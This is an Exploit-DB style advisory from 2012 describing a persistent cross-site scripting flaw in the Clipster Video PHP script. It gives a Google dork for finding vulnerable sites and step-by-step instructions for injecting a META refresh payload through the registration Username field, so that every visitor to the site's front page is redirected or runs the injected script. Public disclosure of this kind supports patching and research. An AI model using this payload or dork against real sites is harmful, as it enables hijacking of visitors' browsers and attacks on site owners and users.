Clipster Video - Persistent Cross-Site Scripting

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2012-09-07  
date_updated: 2012-09-07  
verified: 1  
codes: OSVDB-85204  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21133.txt  

##########################################
[~] Exploit Title: Clipster Video Persistent XSS Vulnerability
[~] Date: 04/09/2012
[~] Author: DaOne
[~] Software Link: http://www.clipsterscript.com/
[~] Google Dork: "Powered by ClipsterScript.com"
##########################################

[#] How to exploit:

1-go to : http://site.com/login.php?action=Register
2-Put in the Username field the XSS Code => Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">
3-Put anything in the other field [Password & E-mail] etc...
4-Now anyone go there : http://site.com/ will redirected to google.com or exploit your XSS Code.



##########################################
[*] Contact me
www.facebook.com/LibyanCA2
##########################################